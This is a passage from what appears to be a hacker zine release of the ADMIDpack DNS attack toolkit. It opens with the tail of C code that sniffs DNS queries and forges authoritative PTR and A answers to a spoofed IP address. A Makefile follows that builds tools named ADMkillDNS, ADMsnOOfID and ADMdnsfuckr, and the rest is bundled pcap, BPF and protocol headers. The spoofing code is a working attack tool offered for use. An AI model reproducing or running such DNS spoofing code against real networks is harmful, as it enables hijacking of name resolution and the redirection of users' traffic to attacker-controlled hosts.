| dnssend->id=dnsrecv->id; /* haha the ID ;) */ |
| dnssend->aa=1; /* i've the authority */ |
| dnssend->ra=1; /* i've the recusion */ |
| dnssend->qr=1; /* its a awser */ |
| dnssend->rep_num = htons(1); /* i've one awnser */ |
|
|
| |
| printf("ID=%i\nnumba of question=%i\nnumba of awnser =%i\n" |
| ,dnssend->id,ntohs(dnssend->que_num),ntohs(dnssend->rep_num)); |
| printf("Question..\n"); |
| printf("domainename=%s\n",data2); |
| printf("type of question=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1)))); |
| printf("type of query=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1+2)))); |
| |
| if( type == TYPE_PTR){ |
| tmp1=strlen(namez)+5; |
| strcpy(data2+tmp1,namez); |
| tmp1=tmp1+strlen(namez)+1; |
| |
| bzero(tmp2,sizeof(tmp2)); |
| nameformat(spoofname,tmp2); |
| printf("tmp2 = %s\n",tmp2); |
| |
| |
| printf(" mouhahahah \n"); |
| *((u_short *)(data2+tmp1)) = htons(TYPE_PTR); |
| *((u_short *)(data2+tmp1+2)) = htons(1); |
| *((u_long *)(data2+tmp1+2+2)) = htonl(86400); |
| *((u_short *)(data2+tmp1+2+2+4)) = htons(strlen((tmp2)+1)); |
| printf("bhaa?.\n"); |
| strcpy((data2+tmp1+2+2+4+2),tmp2); |
| printf(" ouf !! =) \n"); |
| tmp1 = tmp1 +strlen(tmp2)+ 1; |
| |
| } |
| |
| if( type == TYPE_A){ |
| tmp1=strlen(namez)+5; |
| strcpy(data2+tmp1,namez); |
| tmp1=tmp1+strlen(namez)+1; |
| *((u_short *)(data2+tmp1)) = htons(TYPE_A); |
| *((u_short *)(data2+tmp1+2)) = htons(1); |
| *((u_long *)(data2+tmp1+2+2)) = htonl(86400); |
| *((u_short *)(data2+tmp1+2+2+4)) = htons(4); |
| *((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(SPOOFIP); |
| |
| } |
| |
| printf("Answer..\n"); |
| printf("domainname=%s\n",tmp2); |
| printf("type=%i\n",ntohs(*((u_short *)(data2+tmp1)))); |
| printf("classe=%i\n",ntohs(*((u_short *)(data2+tmp1+2)))); |
| printf("time to live=%u\n",ntohl(*((u_long *)(data2+tmp1+2+2)))); |
| printf("resource data lenght=%i\n",ntohs(*((u_short *)(data2+tmp1+2+2+4)))); |
| printf("IP=%s\n",inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2)))); |
| |
| tmp1=tmp1+2+2+4+2+4; /* now tmp1 == the total length of packet dns */ |
| /* without the dnshdr */ |
| |
| |
| udp_send(sraw |
| ,ip->daddr |
| ,ip->saddr |
| ,ntohs(udp->dest) |
| ,ntohs(udp->source) |
| ,buffer2 |
| ,DNSHDRSIZE+tmp1); |
| } /* end of the spoof */ |
| } /* end of while(1) */ |
| } /* The End !! ;) */ |
| <--> |
| <++> ADMIDpack/Makefile |
| # version 0.1 |
| #/usr/contrib/bin/gcc -L. -I. ADMkillDNS.c -lsocket -lnsl -lpcap -o ../ADMbin/ADMkillDNS |
| SHELL = /bin/sh |
| # uncomment this if your are not on LinuX |
| #LIBS = -lsocket -lnsl -lpcap |
| # |
| CC = gcc |
| LIBS = -lpcap |
| BIN = . |
| CFLAGS = -I. -L. |
| all: ADMkillDNS ADMsnOOfID ADMsniffID ADMdnsfuckr ADMnOg00d |
|
|
| ADMkillDNS: ADMkillDNS.c |
| $(CC) $(CFLAGS) ADMkillDNS.c $(LIBS) -o $(BIN)/ADMkillDNS |
|
|
| ADMsnOOfID: ADMsnOOfID.c |
| $(CC) $(CFLAGS) ADMsnOOfID.c $(LIBS) -o $(BIN)/ADMsnOOfID |
|
|
| ADMsniffID: ADMsniffID.c |
| $(CC) $(CFLAGS) ADMsniffID.c $(LIBS) -o $(BIN)/ADMsniffID |
|
|
| ADMdnsfuckr: ADMdnsfuckr.c |
| $(CC) $(CFLAGS) ADMdnsfuckr.c $(LIBS) -o $(BIN)/ADMdnsfuckr |
|
|
| ADMnOg00d: ADMnOg00d.c |
| $(CC) $(CFLAGS) ADMnOg00d.c $(LIBS) -o $(BIN)/ADMnOg00d |
|
|
| clean: |
| rm -f $(BIN)/*o $(BIN)/ADMsniffID $(BIN)/ADMsnOOfID $(BIN)/ADMnOg00d \ |
| $(BIN)/ADMkillDNS $(BIN)/ADMdnsfuckr |
| <--> |
| <++> ADMIDpack/bpf.h |
| /*- |
| * Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 |
| * The Regents of the University of California. All rights reserved. |
| * |
| * This code is derived from the Stanford/CMU enet packet filter, |
| * (net/enet.c) distributed as part of 4.3BSD, and code contributed |
| * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence |
| * Berkeley Laboratory. |
| * |
| * Redistribution and use in source and binary forms, with or without |
| * modification, are permitted provided that the following conditions |
| * are met: |
| * 1. Redistributions of source code must retain the above copyright |
| * notice, this list of conditions and the following disclaimer. |
| * 2. Redistributions in binary form must reproduce the above copyright |
| * notice, this list of conditions and the following disclaimer in the |
| * documentation and/or other materials provided with the distribution. |
| * 3. All advertising materials mentioning features or use of this software |
| * must display the following acknowledgement: |
| * This product includes software developed by the University of |
| * California, Berkeley and its contributors. |
| * 4. Neither the name of the University nor the names of its contributors |
| * may be used to endorse or promote products derived from this software |
| * without specific prior written permission. |
| * |
| * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND |
| * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE |
| * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE |
| * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE |
| * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL |
| * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS |
| * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) |
| * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT |
| * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY |
| * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF |
| * SUCH DAMAGE. |
| * |
| * @(#)bpf.h 7.1 (Berkeley) 5/7/91 |
| * |
| * @(#) $Header: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL) |
| */ |
|
|
| #ifndef BPF_MAJOR_VERSION |
|
|
| /* BSD style release date */ |
| #define BPF_RELEASE 199606 |
|
|
| typedef int bpf_int32; |
| typedef u_int bpf_u_int32; |
|
|
| /* |
| * Alignment macros. BPF_WORDALIGN rounds up to the next |
| * even multiple of BPF_ALIGNMENT. |
| */ |
| #define BPF_ALIGNMENT sizeof(bpf_int32) |
| #define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1)) |
|
|
| #define BPF_MAXINSNS 512 |
| #define BPF_MAXBUFSIZE 0x8000 |
| #define BPF_MINBUFSIZE 32 |
|
|
| /* |
| * Structure for BIOCSETF. |
| */ |
| struct bpf_program { |
| u_int bf_len; |
| struct bpf_insn *bf_insns; |
| }; |
| |
| /* |
| * Struct returned by BIOCGSTATS. |
| */ |
| struct bpf_stat { |
| u_int bs_recv; /* number of packets received */ |
| u_int bs_drop; /* number of packets dropped */ |
| }; |
|
|
| /* |
| * Struct return by BIOCVERSION. This represents the version number of |
| * the filter language described by the instruction encodings below. |
| * bpf understands a program iff kernel_major == filter_major && |
| * kernel_minor >= filter_minor, that is, if the value returned by the |
| * running kernel has the same major number and a minor number equal |
| * equal to or less than the filter being downloaded. Otherwise, the |
| * results are undefined, meaning an error may be returned or packets |
| * may be accepted haphazardly. |
| * It has nothing to do with the source code version. |
| */ |
| struct bpf_version { |
| u_short bv_major; |
| u_short bv_minor; |
| }; |
| /* Current version number of filter architecture. */ |
| #define BPF_MAJOR_VERSION 1 |
| #define BPF_MINOR_VERSION 1 |
|
|
| /* |
| * BPF ioctls |
| * |
| * The first set is for compatibility with Sun's pcc style |
| * header files. If your using gcc, we assume that you |
| * have run fixincludes so the latter set should work. |
| */ |
| #if (defined(sun) || defined(ibm032)) && !defined(__GNUC__) |
| #define BIOCGBLEN _IOR(B,102, u_int) |
| #define BIOCSBLEN _IOWR(B,102, u_int) |
| #define BIOCSETF _IOW(B,103, struct bpf_program) |
| #define BIOCFLUSH _IO(B,104) |
| #define BIOCPROMISC _IO(B,105) |
| #define BIOCGDLT _IOR(B,106, u_int) |
| #define BIOCGETIF _IOR(B,107, struct ifreq) |
| #define BIOCSETIF _IOW(B,108, struct ifreq) |
| #define BIOCSRTIMEOUT _IOW(B,109, struct timeval) |
| #define BIOCGRTIMEOUT _IOR(B,110, struct timeval) |
| #define BIOCGSTATS _IOR(B,111, struct bpf_stat) |
| #define BIOCIMMEDIATE _IOW(B,112, u_int) |
| #define BIOCVERSION _IOR(B,113, struct bpf_version) |
| #define BIOCSTCPF _IOW(B,114, struct bpf_program) |
| #define BIOCSUDPF _IOW(B,115, struct bpf_program) |
| #else |
| #define BIOCGBLEN _IOR('B',102, u_int) |
| #define BIOCSBLEN _IOWR('B',102, u_int) |
| #define BIOCSETF _IOW('B',103, struct bpf_program) |
| #define BIOCFLUSH _IO('B',104) |
| #define BIOCPROMISC _IO('B',105) |
| #define BIOCGDLT _IOR('B',106, u_int) |
| #define BIOCGETIF _IOR('B',107, struct ifreq) |
| #define BIOCSETIF _IOW('B',108, struct ifreq) |
| #define BIOCSRTIMEOUT _IOW('B',109, struct timeval) |
| #define BIOCGRTIMEOUT _IOR('B',110, struct timeval) |
| #define BIOCGSTATS _IOR('B',111, struct bpf_stat) |
| #define BIOCIMMEDIATE _IOW('B',112, u_int) |
| #define BIOCVERSION _IOR('B',113, struct bpf_version) |
| #define BIOCSTCPF _IOW('B',114, struct bpf_program) |
| #define BIOCSUDPF _IOW('B',115, struct bpf_program) |
| #endif |
|
|
| /* |
| * Structure prepended to each packet. |
| */ |
| struct bpf_hdr { |
| struct timeval bh_tstamp; /* time stamp */ |
| bpf_u_int32 bh_caplen; /* length of captured portion */ |
| bpf_u_int32 bh_datalen; /* original length of packet */ |
| u_short bh_hdrlen; /* length of bpf header (this struct |
| plus alignment padding) */ |
| }; |
| /* |
| * Because the structure above is not a multiple of 4 bytes, some compilers |
| * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work. |
| * Only the kernel needs to know about it; applications use bh_hdrlen. |
| */ |
| #ifdef KERNEL |
| #define SIZEOF_BPF_HDR 18 |
| #endif |
|
|
| /* |
| * Data-link level type codes. |
| */ |
| #define DLT_NULL 0 /* no link-layer encapsulation */ |
| #define DLT_EN10MB 1 /* Ethernet (10Mb) */ |
| #define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */ |
| #define DLT_AX25 3 /* Amateur Radio AX.25 */ |
| #define DLT_PRONET 4 /* Proteon ProNET Token Ring */ |
| #define DLT_CHAOS 5 /* Chaos */ |
| #define DLT_IEEE802 6 /* IEEE 802 Networks */ |
| #define DLT_ARCNET 7 /* ARCNET */ |
| #define DLT_SLIP 8 /* Serial Line IP */ |
| #define DLT_PPP 9 /* Point-to-point Protocol */ |
| #define DLT_FDDI 10 /* FDDI */ |
| #define DLT_ATM_RFC1483 11 /* LLC/SNAP encapsulated atm */ |
| #define DLT_RAW 12 /* raw IP */ |
| #define DLT_SLIP_BSDOS 13 /* BSD/OS Serial Line IP */ |
| #define DLT_PPP_BSDOS 14 /* BSD/OS Point-to-point Protocol */ |
|
|
| /* |
| * The instruction encondings. |
| */ |
| /* instruction classes */ |
| #define BPF_CLASS(code) ((code) & 0x07) |
| #define BPF_LD 0x00 |
| #define BPF_LDX 0x01 |
| #define BPF_ST 0x02 |
| #define BPF_STX 0x03 |
| #define BPF_ALU 0x04 |
| #define BPF_JMP 0x05 |
| #define BPF_RET 0x06 |
| #define BPF_MISC 0x07 |
|
|
| /* ld/ldx fields */ |
| #define BPF_SIZE(code) ((code) & 0x18) |
| #define BPF_W 0x00 |
| #define BPF_H 0x08 |
| #define BPF_B 0x10 |
| #define BPF_MODE(code) ((code) & 0xe0) |
| #define BPF_IMM 0x00 |
| #define BPF_ABS 0x20 |
| #define BPF_IND 0x40 |
| #define BPF_MEM 0x60 |
| #define BPF_LEN 0x80 |
| #define BPF_MSH 0xa0 |
|
|
| /* alu/jmp fields */ |
| #define BPF_OP(code) ((code) & 0xf0) |
| #define BPF_ADD 0x00 |
| #define BPF_SUB 0x10 |
| #define BPF_MUL 0x20 |
| #define BPF_DIV 0x30 |
| #define BPF_OR 0x40 |
| #define BPF_AND 0x50 |
| #define BPF_LSH 0x60 |
| #define BPF_RSH 0x70 |
| #define BPF_NEG 0x80 |
| #define BPF_JA 0x00 |
| #define BPF_JEQ 0x10 |
| #define BPF_JGT 0x20 |
| #define BPF_JGE 0x30 |
| #define BPF_JSET 0x40 |
| #define BPF_SRC(code) ((code) & 0x08) |
| #define BPF_K 0x00 |
| #define BPF_X 0x08 |
|
|
| /* ret - BPF_K and BPF_X also apply */ |
| #define BPF_RVAL(code) ((code) & 0x18) |
| #define BPF_A 0x10 |
|
|
| /* misc */ |
| #define BPF_MISCOP(code) ((code) & 0xf8) |
| #define BPF_TAX 0x00 |
| #define BPF_TXA 0x80 |
|
|
| /* |
| * The instruction data structure. |
| */ |
| struct bpf_insn { |
| u_short code; |
| u_char jt; |
| u_char jf; |
| bpf_int32 k; |
| }; |
|
|
| /* |
| * Macros for insn array initializers. |
| */ |
| #define BPF_STMT(code, k) { (u_short)(code), 0, 0, k } |
| #define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k } |
|
|
| #ifdef KERNEL |
| extern u_int bpf_filter(); |
| extern void bpfattach(); |
| extern void bpf_tap(); |
| extern void bpf_mtap(); |
| #else |
| #if __STDC__ |
| extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int); |
| #endif |
| #endif |
|
|
| /* |
| * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST). |
| */ |
| #define BPF_MEMWORDS 16 |
|
|
| #endif |
| <--> |
| <++> ADMIDpack/dns.h |
|
|
| #define DNSHDRSIZE 12 |
| |
| struct dnshdr { |
| unsigned short int id; |
|
|
| unsigned char rd:1; /* recursion desired */ |
| unsigned char tc:1; /* truncated message */ |
| unsigned char aa:1; /* authoritive answer */ |
| unsigned char opcode:4; /* purpose of message */ |
| unsigned char qr:1; /* response flag */ |
|
|
| unsigned char rcode:4; /* response code */ |
| unsigned char unused:2; /* unused bits */ |
| unsigned char pr:1; /* primary server required (non standard) */ |
| unsigned char ra:1; /* recursion available */ |
|
|
| unsigned short int que_num; |
| unsigned short int rep_num; |
| unsigned short int num_rr; |
| unsigned short int num_rrsup; |
| }; |
| <--> |
| <++> ADMIDpack/ip.h |
|
|
| /* adapted from tcpdump */ |
|
|
| #ifndef IPVERSION |
| #define IPVERSION 4 |
| #endif /* IPVERISON */ |
|
|
| struct iphdr { |
| u_char ihl:4, /* header length */ |
| version:4; /* version */ |
| u_char tos; /* type of service */ |
| short tot_len; /* total length */ |
| u_short id; /* identification */ |
| short off; /* fragment offset field */ |
| #define IP_DF 0x4000 /* dont fragment flag */ |
| #define IP_MF 0x2000 /* more fragments flag */ |
| u_char ttl; /* time to live */ |
| u_char protocol; /* protocol */ |
| u_short check; /* checksum */ |
| struct in_addr saddr, daddr; /* source and dest address */ |
| }; |
|
|
| #ifndef IP_MAXPACKET |
| #define IP_MAXPACKET 65535 |
| #endif /* IP_MAXPACKET */ |
| <--> |
| <++> ADMIDpack/pcap.h |
| /* |
| * Copyright (c) 1993, 1994, 1995, 1996, 1997 |
| * The Regents of the University of California. All rights reserved. |
| * |
| * Redistribution and use in source and binary forms, with or without |
| * modification, are permitted provided that the following conditions |
| * are met: |
| * 1. Redistributions of source code must retain the above copyright |
| * notice, this list of conditions and the following disclaimer. |
| * 2. Redistributions in binary form must reproduce the above copyright |
| * notice, this list of conditions and the following disclaimer in the |
| * documentation and/or other materials provided with the distribution. |
| * 3. All advertising materials mentioning features or use of this software |
| * must display the following acknowledgement: |
| * This product includes software developed by the Computer Systems |
| * Engineering Group at Lawrence Berkeley Laboratory. |
| * 4. Neither the name of the University nor of the Laboratory may be used |
| * to endorse or promote products derived from this software without |
| * specific prior written permission. |
| * |
| * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND |
| * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE |
| * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE |
| * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE |
| * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL |
| * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS |
| * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) |
| * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT |
| * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY |
| * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF |
| * SUCH DAMAGE. |
| * |
| * @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL) |
| */ |
|
|
| #ifndef lib_pcap_h |
| #define lib_pcap_h |
|
|
| #include <sys/types.h> |
| #include <sys/time.h> |
|
|
| #include <bpf.h> |
|
|
| #include <stdio.h> |
|
|
| #define PCAP_VERSION_MAJOR 2 |
| #define PCAP_VERSION_MINOR 4 |
|
|
| #define PCAP_ERRBUF_SIZE 256 |
|
|
| /* |
| * Compatibility for systems that have a bpf.h that |
| * predates the bpf typedefs for 64-bit support. |
| */ |
| #if BPF_RELEASE - 0 < 199406 |
| typedef int bpf_int32; |
| typedef u_int bpf_u_int32; |
| #endif |
|
|
| typedef struct pcap pcap_t; |
| typedef struct pcap_dumper pcap_dumper_t; |
|
|
| /* |
| * The first record in the file contains saved values for some |
| * of the flags used in the printout phases of tcpdump. |
| * Many fields here are 32 bit ints so compilers won't insert unwanted |
| * padding; these files need to be interchangeable across architectures. |
| */ |
| struct pcap_file_header { |
| bpf_u_int32 magic; |
| u_short version_major; |
| u_short version_minor; |
| bpf_int32 thiszone; /* gmt to local correction */ |
| bpf_u_int32 sigfigs; /* accuracy of timestamps */ |
| bpf_u_int32 snaplen; /* max length saved portion of each pkt */ |
| bpf_u_int32 linktype; /* data link type (DLT_*) */ |
| }; |
|
|
| /* |
| * Each packet in the dump file is prepended with this generic header. |
| * This gets around the problem of different headers for different |
| * packet interfaces. |
| */ |
| struct pcap_pkthdr { |
| struct timeval ts; /* time stamp */ |
| bpf_u_int32 caplen; /* length of portion present */ |
| bpf_u_int32 len; /* length this packet (off wire) */ |
| }; |
|
|
| /* |
| * As returned by the pcap_stats() |
| */ |
| struct pcap_stat { |
| u_int ps_recv; /* number of packets received */ |
| u_int ps_drop; /* number of packets dropped */ |
| u_int ps_ifdrop; /* drops by interface XXX not yet supported */ |
| }; |
|
|
| typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *, |
| const u_char *); |
|
|
| char *pcap_lookupdev(char *); |
| int pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *); |
| pcap_t *pcap_open_live(char *, int, int, int, char *); |
| pcap_t *pcap_open_offline(const char *, char *); |
| void pcap_close(pcap_t *); |
| int pcap_loop(pcap_t *, int, pcap_handler, u_char *); |
| int pcap_dispatch(pcap_t *, int, pcap_handler, u_char *); |
| const u_char* |
| pcap_next(pcap_t *, struct pcap_pkthdr *); |
| int pcap_stats(pcap_t *, struct pcap_stat *); |
| int pcap_setfilter(pcap_t *, struct bpf_program *); |
| void pcap_perror(pcap_t *, char *); |
| char *pcap_strerror(int); |
| char *pcap_geterr(pcap_t *); |
| int pcap_compile(pcap_t *, struct bpf_program *, char *, int, |
| bpf_u_int32); |
| /* XXX */ |
| int pcap_freecode(pcap_t *, struct bpf_program *); |
| int pcap_datalink(pcap_t *); |
| int pcap_snapshot(pcap_t *); |
| int pcap_is_swapped(pcap_t *); |
| int pcap_major_version(pcap_t *); |
| int pcap_minor_version(pcap_t *); |
|
|
| /* XXX */ |
| FILE *pcap_file(pcap_t *); |
| int pcap_fileno(pcap_t *); |
|
|
| pcap_dumper_t *pcap_dump_open(pcap_t *, const char *); |
| void pcap_dump_close(pcap_dumper_t *); |
| void pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *); |
|
|
| /* XXX this guy lives in the bpf tree */ |
| u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int); |
| char *bpf_image(struct bpf_insn *, int); |
| #endif |
| <--> |
| <++> ADMIDpack/udp.h |
| struct udphdr { |
| u_short source; /* source port */ |
| u_short dest; /* destination port */ |
| u_short len; /* udp length */ |
| u_short check; /* udp checksum */ |
| }; |
| <--> |
|
|
| ----[ EOF |
|
|